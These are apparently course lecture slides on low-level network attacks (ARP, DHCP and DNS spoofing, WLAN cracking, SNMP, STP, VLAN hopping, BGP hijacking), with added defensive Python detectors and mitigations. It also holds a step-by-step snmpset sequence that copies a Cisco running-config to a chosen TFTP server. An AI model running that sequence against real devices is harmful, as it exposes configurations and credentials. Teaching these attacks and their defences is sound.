Jeroen van Beek

Why bother?
Popular / interesting attacks
Now what?
Questions?

Low-level attacks can be very dangerous
◦ In many cases difficult to detect / prevent in higher OSI levels

Passive attack
Works on non-switched networks
◦ Including WLAN
Find interesting information
◦ Plain text services
◦ HTTP logins (see lab assignment)
◦ SNMP
◦ Telnet (still used in some environments!)
◦ Password hashes (‘pass the hash’)
Detection and prevention
◦ Use switched networks

Active attack
Switched environments only show broadcast / multicast traffic
Overflow CAM tables
◦ Switch will forward traffic to all ports
◦ See dsniff’s macof: https://www.monkey.org/~dugsong/dsniff/
Detection and prevention
◦ Limit the number of MACs per switch port
  ◦ Monitor or auto shutdown

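The “limit the number of MACs per switch port” mitigation written out as detection logic, added here as an example (not from the slides or from dsniff): it counts distinct source MACs per port over a constructed batch of learned frames and flags any port that exceeds a port-security style maximum, which is what a macof-style flood looks like from the switch’s side. Port names and MACs are constructed.

```python
from collections import defaultdict

# Constructed sample: (switch port, source MAC) pairs as a switch would learn them.
# Gi1/1 and Gi1/2 behave normally; Gi1/3 sees a flood of 300 random-looking MACs.
SAMPLE_FRAMES = (
    [("Gi1/1", "00:11:22:33:44:01"), ("Gi1/2", "00:11:22:33:44:02")] * 5
    + [("Gi1/3", f"02:00:00:00:{i // 256:02x}:{i % 256:02x}") for i in range(300)]
)


def learned_macs_per_port(frames):
    """Return {port: set(source MACs)} the way a CAM table learner would build it."""
    table = defaultdict(set)
    for port, mac in frames:
        table[port].add(mac.lower())
    return table


def flooded_ports(frames, max_macs=8):
    """Ports whose number of distinct source MACs exceeds max_macs.

    max_macs plays the role of the port-security maximum on a real switch;
    a violation there would err-disable the port or send a syslog/SNMP trap."""
    table = learned_macs_per_port(frames)
    return {port: len(macs) for port, macs in table.items() if len(macs) > max_macs}


def cam_table_overflow(frames, capacity=8192):
    """True when the total number of learned MACs exceeds the (assumed) CAM capacity,
    the point at which the switch falls back to flooding unknown unicast."""
    table = learned_macs_per_port(frames)
    return sum(len(m) for m in table.values()) > capacity


if __name__ == "__main__":
    for port, count in flooded_ports(SAMPLE_FRAMES).items():
        print(f"ALERT: {count} MACs learned on {port}; possible CAM table flood")
```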
Using a forged source IP address for
◦ Impersonating other systems
Targets
◦ UDP services
◦ TCP services with predictable characteristics
◦ DoS

Oldskewl problem
Weak authentication mechanisms using UDP
◦ Add your system to the list of trusted systems using a spoofed packet
More difficult to exploit for TCP services
◦ Because of handshaking
◦ However not impossible with TCP sequence prediction
However old mistakes are made again
◦ Everything over IP
◦ Burglar alarm over UDP
  ◦ Including status messages and switching the system off

Kaminsky DNS Spoofing
◦ Attacker’s website contains link to x.domain.com
  ◦ E.g. an image
◦ Target’s DNS server resolves x.domain.com
◦ The attacker knows this and sends replies with fake records to the target
  ◦ UDP, query ID (QID) identifies the reply
  ◦ QID is a 16-bit value (65,536 possibilities): send them all
  ◦ Include a forged referral for domain.com to poison the cache
◦ domain.com points to an IP of the attacker’s choice
◦ http://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Kaminsky/BlackHat-Japan-08-Kaminsky-DNS08-BlackOps.pdf

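A resolver-side check for the reply flood described above, added as an example (not from the slides or from Kaminsky’s paper): outstanding queries are tracked by (source port, name), a response is accepted only when port, name and QID all match, and non-matching answers are counted per sender, since guessing all 65,536 QIDs shows up as thousands of wrong answers for one name from one host. Records, IPs and the threshold are constructed.

```python
from collections import Counter

# Constructed records. A query is (src_port, qname, qid); a response is
# (sender_ip, dst_port, qname, qid). The resolver sent one real query and
# then sees 1,000 guessed answers from a spoofing host plus the real one.
QUERIES = [(40123, "x.domain.com", 0x1A2B)]
RESPONSES = (
    [("203.0.113.9", 40123, "x.domain.com", qid) for qid in range(1000)]
    + [("198.51.100.53", 40123, "x.domain.com", 0x1A2B)]
)


def classify_responses(queries, responses):
    """Return (accepted, mismatches_per_sender).

    accepted: responses whose (port, qname, qid) matches an outstanding query.
    mismatches_per_sender: Counter of non-matching responses keyed by sender IP."""
    outstanding = {(port, qname): qid for port, qname, qid in queries}
    accepted, mismatches = [], Counter()
    for sender, port, qname, qid in responses:
        if outstanding.get((port, qname)) == qid:
            accepted.append((sender, qname, qid))
        else:
            mismatches[sender] += 1
    return accepted, mismatches


def spoofing_suspects(mismatches, threshold=50):
    """Senders producing more than `threshold` non-matching answers.

    With randomized source ports the guess space grows from 2^16 to roughly
    2^32, so the same flood has to be far larger and stands out even more."""
    return {ip for ip, n in mismatches.items() if n > threshold}
```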
Mainly used for DoS attacks
Increasing efficiency
◦ NTP monlist
◦ SNMP
◦ DNS: ANY query, DNSSEC
Send one spoofed packet to a broadcast address
◦ Many hosts / services reply to the spoofed address
◦ So called ‘smurf attack’

Detection
◦ Check source IPs
  ◦ IDS
Prevention
◦ Do not use source IPs for authentication purposes
◦ Do not use UDP for (indirect) authentication purposes
◦ Ingress / egress filtering
  ◦ Drop spoofed packets
  ◦ RFC 2827

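The RFC 2827 ingress/egress filtering from the prevention list, written out as an added example (not from the slides): each customer-facing interface is mapped to the source prefixes legitimately expected on it, the upstream interface rejects packets claiming one of our own addresses or a bogon source, and the egress side only lets our own addresses leave. Interface names, prefixes and sample packets are constructed.

```python
import ipaddress

# Constructed topology: our address space, the customer ports and their prefixes.
OUR_PREFIXES = [ipaddress.ip_network("203.0.113.0/24"), ipaddress.ip_network("198.51.100.0/24")]
INGRESS_POLICY = {
    "eth1": [ipaddress.ip_network("203.0.113.0/25")],                                             # customer A
    "eth2": [ipaddress.ip_network("203.0.113.128/25"), ipaddress.ip_network("198.51.100.0/24")],  # customer B
}
BOGONS = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16")]


def in_any(addr, prefixes):
    return any(addr in p for p in prefixes)


def ingress_verdict(interface, src_ip):
    """'accept' or 'drop' for a packet with src_ip arriving on interface.

    Customer ports: the source must lie in that customer's prefixes (RFC 2827).
    Upstream port: the source must not be one of our prefixes (an outside
    packet pretending to be one of our hosts, e.g. a smurf trigger) or a bogon."""
    addr = ipaddress.ip_address(src_ip)
    if interface in INGRESS_POLICY:
        return "accept" if in_any(addr, INGRESS_POLICY[interface]) else "drop"
    if interface == "upstream":
        return "drop" if in_any(addr, OUR_PREFIXES) or in_any(addr, BOGONS) else "accept"
    return "drop"  # unknown interface: fail closed


def egress_verdict(src_ip):
    """Egress side: packets leaving towards the upstream must carry one of our addresses."""
    return "accept" if in_any(ipaddress.ip_address(src_ip), OUR_PREFIXES) else "drop"


def apply_policy(packets):
    """Verdicts for a list of (interface, source IP) packets."""
    return [(iface, ip, ingress_verdict(iface, ip)) for iface, ip in packets]


# Constructed packets with the expected verdict in the comment.
SAMPLE_PACKETS = [
    ("eth1", "203.0.113.10"),     # accept: customer A, own prefix
    ("eth1", "198.51.100.7"),     # drop: customer A spoofing customer B's range
    ("eth2", "8.8.8.8"),          # drop: customer B spoofing an outside address
    ("upstream", "203.0.113.1"),  # drop: outside packet claiming one of our addresses
    ("upstream", "192.0.2.44"),   # accept: ordinary internet source
]
```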
Used to become a man in the middle
Attacker answers clients before the real server does
◦ Provide the client with fake DNS servers / gateway / ...
Monitor / modify traffic
Detection and prevention
◦ Several tools out there for detection:
  ◦ Network devices: DHCP snooping
  ◦ UNIX: dhcp_probe
  ◦ Windows: dhcploc
◦ Shut down unused network ports
◦ Lock down client PCs

Ethernet attack, both for wired and wireless
Forge ARP replies (a fake MAC for an IP address) to become a man in the middle

Find interesting information
◦ Plain text services
◦ Password hashes
Use MITM exploits for specific services
◦ E.g. SSHv1, HTTPS, POPS, IMAPS, SIPS, RDP
Sophisticated tools are available, automating MITM, sniffing and cracking
◦ Ettercap https://github.com/Ettercap/ettercap
  ◦ Sed for network traffic
◦ Cain & Abel http://www.oxid.it/cain.html
  ◦ http://www.youtube.com/watch?v=BXPqq_XQZu8

Detection and prevention
◦ Network devices: ARP inspection
◦ Limit the number of MACs per switch port
  ◦ Monitor or auto shutdown

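The “ARP inspection” mitigation in the form a switch applies it, added here as an example (not from the slides, Ettercap or Cain & Abel): ARP replies arriving on untrusted ports are checked against a trusted IP-to-MAC binding table (on a switch this is the DHCP snooping table; a static dictionary here), and a reply whose sender MAC contradicts the known binding for its sender IP is dropped and reported. Bindings, ports and ARP records are constructed.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    port: str        # switch port the reply arrived on
    sender_ip: str   # "I am this IP ..."
    sender_mac: str  # "... at this MAC"


# Constructed binding table as DHCP snooping would have built it (IP -> MAC).
BINDINGS = {
    "192.168.1.1": "00:1a:2b:3c:4d:01",   # default gateway
    "192.168.1.10": "00:1a:2b:3c:4d:10",  # a client
}

# Constructed ARP replies: a genuine gateway reply, then a host on Gi1/7
# claiming the gateway's IP (the MITM pattern), then an unknown new host.
SAMPLE_REPLIES = [
    ArpReply("Gi1/1", "192.168.1.1", "00:1a:2b:3c:4d:01"),
    ArpReply("Gi1/7", "192.168.1.1", "00:1a:2b:3c:4d:77"),
    ArpReply("Gi1/9", "192.168.1.99", "00:1a:2b:3c:4d:99"),
]


def inspect(reply, bindings, trusted_ports=("Gi1/24",)):
    """Return 'permit', 'drop-binding-mismatch' or 'drop-no-binding'.

    Trusted ports (uplinks to other switches) are not inspected, mirroring
    the trusted/untrusted split of dynamic ARP inspection on switches."""
    if reply.port in trusted_ports:
        return "permit"
    known = bindings.get(reply.sender_ip)
    if known is None:
        return "drop-no-binding"
    return "permit" if known.lower() == reply.sender_mac.lower() else "drop-binding-mismatch"


def spoof_alerts(replies, bindings):
    """(port, ip, mac) of replies that contradict an existing binding."""
    return [(r.port, r.sender_ip, r.sender_mac) for r in replies
            if inspect(r, bindings) == "drop-binding-mismatch"]
```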
In most cases no device authentication
In many cases shared secrets
◦ WEP (still used for e.g. legacy industrial applications)
◦ WPA PSK (‘pre shared keys’)
◦ One key to own them all!
Flaws in crypto
◦ WEP
◦ WPA TKIP
◦ WPS

Attacking isolated wireless networks
◦ High power adapters
◦ High gain antennas
Attacking crypto
◦ Weaknesses allow an attacker to retrieve the secret key
◦ Aircrack-ng http://www.aircrack-ng.org/
◦ After retrieving the key it’s a virtual plain network cable
Attacking passwords
◦ Defaults
◦ Easy-to-guess / crack
◦ MAC derived: https://www.usenix.org/system/files/conference/woot15/woot15-paper-lorente.pdf
◦ Jam the signal first to trigger association messages

Attacking OS functionality
◦ Popular OSs store WLAN settings
◦ Device tries to find the SSIDs automatically
◦ Set up your own access point
  ◦ Forward traffic to the real access point
  ◦ MITM
Detection and prevention
◦ Detection of rogue APs
◦ Prevent problems by hardening wireless equipment and by using proven technologies
  ◦ IEEE 802.1X
  ◦ AES encryption

Many protocols are used for network management
◦ Simple Network Management Protocol (SNMP)
◦ Spanning Tree Protocol (STP)
◦ Cisco Discovery Protocol (CDP)
◦ Hot Standby Router Protocol (HSRP)
◦ …
Most are OSI layer 2 based
Most are designed with availability in mind
◦ Weak / no security features
Many are enabled by default

Example: SNMP
◦ Uses ‘community strings’
  ◦ Some kind of secret password
  ◦ Read-only and read-write
  ◦ Defaults: ‘public’ and ‘private’
◦ Attacks
  ◦ Guess / brute force community string
  ◦ Most OSs: information leakage (accounts, routing)
  ◦ Cisco: dump config

# Dumping a Cisco running-config over SNMP (CISCO-CONFIG-COPY-MIB, ccCopyEntry row 111); requires a read-write community
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
# The ConfigCopyProtocol is set to TFTP
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4
# Set the SourceFileType to running-config
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1
# Set the DestinationFileType to networkfile
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a <TFTP IP>
# Sets the ServerAddress to the IP address of the TFTP server
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s <Filename>
# Sets the CopyFilename to your desired file name
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
# Sets the CopyStatus (row status) to active, which starts the copy process
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
# Sets the CopyStatus (row status) to delete, which cleans all saved information out of the MIB

Example: Spanning Tree Protocol
◦ Used for redundancy
◦ Takes care of topology changes
  ◦ Broken network links
  ◦ Network loops
  ◦ Malfunctioning network devices
◦ One device is the ‘root’
  ◦ The root can trigger a reconfiguration
◦ During reconfiguration all devices act like a hub
  ◦ Sniffing
◦ No security features in the protocol
  ◦ Become the root and reconfigure the network in such a way that all traffic passes through your system

Detection
◦ Monitor topology changes
  ◦ In practice: ?
Prevention
◦ IP based: ACLs
◦ Use security features of network equipment
◦ Never use network management protocols on access ports of end-users
◦ Disable all unneeded management protocols

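One concrete answer to “monitor topology changes, in practice: ?”, added as an example (not the slides’ tooling): a checker over constructed BPDU records that raises an alert when any BPDU arrives on a user-facing access port (the BPDU guard rule) or when a BPDU claims a root bridge that is better than the configured root (the root guard rule), which is exactly what a “become the root” attempt produces. Port names, bridge IDs and the BPDU stream are constructed.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Bpdu:
    port: str           # port the BPDU was received on
    root_priority: int  # bridge priority claimed for the root (lower wins)
    root_mac: str       # bridge MAC of the claimed root


# Constructed configuration: the known root bridge, the uplink that legitimately
# carries BPDUs, and the user-facing access ports where no bridge should speak STP.
EXPECTED_ROOT = (4096, "00:1a:2b:00:00:01")
UPLINK_PORTS = {"Gi1/24"}
ACCESS_PORTS = {"Gi1/1", "Gi1/2", "Gi1/3"}


def bridge_id(priority, mac):
    """STP compares priority first, then MAC; the smaller tuple is the better bridge."""
    return (priority, mac.lower())


def check_bpdu(bpdu, expected_root=EXPECTED_ROOT):
    """Return a list of alert strings for one received BPDU (empty means fine)."""
    alerts = []
    if bpdu.port in ACCESS_PORTS:
        alerts.append(f"bpduguard: BPDU on access port {bpdu.port}; port should be err-disabled")
    claimed = bridge_id(bpdu.root_priority, bpdu.root_mac)
    if claimed < bridge_id(*expected_root):
        alerts.append(f"rootguard: superior root {claimed} claimed on {bpdu.port}; "
                      f"configured root is {bridge_id(*expected_root)}")
    return alerts


def monitor(bpdus):
    """All alerts for a stream of BPDUs, in arrival order."""
    return [a for b in bpdus for a in check_bpdu(b)]


# Constructed BPDU stream: a normal hello from the real root over the uplink,
# then a device on an access port advertising a root with priority 0.
SAMPLE_BPDUS = [
    Bpdu("Gi1/24", 4096, "00:1a:2b:00:00:01"),
    Bpdu("Gi1/2", 0, "02:00:00:00:00:01"),
]
```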
Connect to other, less restrictive, VLANs
◦ In many cases supported built-in in the driver
◦ Fancy tools available to make attacks easy to perform, e.g. (ab)using misconfigured network management protocols: http://www.yersinia.net/
◦ https://github.com/nccgroup/vlan-hopping---frogger
Detection
◦ Not needed, just prevent it
Prevention
◦ Disable trunk negotiation
◦ Configure ports as access ports
◦ Don’t use VLAN 1

Used for core routing on the internet
◦ Autonomous Systems (AS) advertise IP ranges that are reachable using their routers
Become an AS and start peering
Advertise IP ranges that aren’t yours
◦ Traffic is routed via your systems
◦ Sniffing, MITM
◦ Happens accidentally and on purpose

Attacks
◦ http://www.blackhat.com/presentations/bh-europe-09/Rey_Mende/BlackHat-Europe-2009-Mende-Rey-All-Your-Packets-slides.pdf
◦ http://www.blackhat.com/docs/us-15/materials/us-15-Gavrichenkov-Breaking-HTTPS-With-BGP-Hijacking-wp.pdf
Detection
◦ Monitoring: https://bgpmon.net/
Prevention
◦ RPKI?

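What “RPKI?” amounts to on the receiving router, as an added worked example (not from the slides or bgpmon): constructed ROAs (prefix, maximum length, authorised origin AS) are used to classify BGP announcements as valid, invalid or not-found following the RFC 6811 rules, so an announcement of someone else’s prefix, or an over-specific one, comes out invalid. Prefixes, AS numbers and routes are constructed.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Roa:
    prefix: str
    max_length: int
    asn: int


# Constructed ROAs: AS64500 may originate 203.0.113.0/24 and its /25s,
# AS64501 may originate 198.51.100.0/24 only as a /24.
ROAS = [Roa("203.0.113.0/24", 25, 64500), Roa("198.51.100.0/24", 24, 64501)]


def covered(roa, prefix):
    """RFC 6811 'covered': the ROA prefix contains the announced prefix (max length not considered)."""
    rp, ap = ipaddress.ip_network(roa.prefix), ipaddress.ip_network(prefix)
    return rp.version == ap.version and ap.subnet_of(rp)


def matched(roa, prefix, origin_asn):
    """RFC 6811 'matched': covered, not longer than max length, and the same origin AS."""
    ap = ipaddress.ip_network(prefix)
    return covered(roa, prefix) and ap.prefixlen <= roa.max_length and roa.asn == origin_asn


def validate(prefix, origin_asn, roas=ROAS):
    """'valid' if any ROA matches, 'invalid' if some ROA covers the prefix but none
    matches, 'not-found' if no ROA covers it (such routes are usually still accepted)."""
    covering = [r for r in roas if covered(r, prefix)]
    if any(matched(r, prefix, origin_asn) for r in covering):
        return "valid"
    return "invalid" if covering else "not-found"


def validate_all(routes, roas=ROAS):
    """(prefix, origin AS, state) for a list of (prefix, origin AS) announcements."""
    return [(p, a, validate(p, a, roas)) for p, a in routes]


# Constructed announcements: (prefix, origin AS) with the expected state in the comment.
SAMPLE_ROUTES = [
    ("203.0.113.0/24", 64500),  # valid: legitimate origin
    ("203.0.113.0/25", 64500),  # valid: more specific, within max length
    ("203.0.113.0/26", 64500),  # invalid: more specific than the ROA allows
    ("203.0.113.0/24", 64666),  # invalid: hijack, wrong origin AS
    ("192.0.2.0/24", 64666),    # not-found: no ROA published for this space
]
```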
Abuse authorized protocols to open unauthorized communication channels
◦ TCP over ICMP
  ◦ Ptunnel @ http://www.cs.uit.no/~daniels/PingTunnel/
◦ Tunnel IP over DNS
  ◦ Iodine @ http://code.kryo.se/iodine/
◦ Tunnel IP over …
  ◦ Everything!
◦ See https://www.os3.nl/_media/2005-2006/rp1/ms_mk_report.pdf, http://www.delaat.net/rp/2014-2015/p98/report.pdf and recent OT projects
Detection
◦ Lab assignment!
Prevention
◦ Lab assignment!

Sensitive information might also use other networks
◦ DECT, GSM, Bluetooth, …
Those are not covered in this talk
◦ However: be aware of the risks!
More and more phones and tablets are part of the network…
◦ Are they (also) well-protected against the attacks we’ve seen earlier today?

Detection:
◦ Detection of well-known attacks using IDS
Prevention:
◦ Don’t trust the network!
◦ Shut down all unused ports
◦ Enforce the use of safe protocols
  ◦ Problems on lower OSI levels shouldn’t affect the security level of applications
There’s more than (wireless) Ethernet
◦ Be aware of other technologies that provide access to sensitive information
  ◦ DECT, GSM, VoIP, …

J.C.vanBeek@uva.nl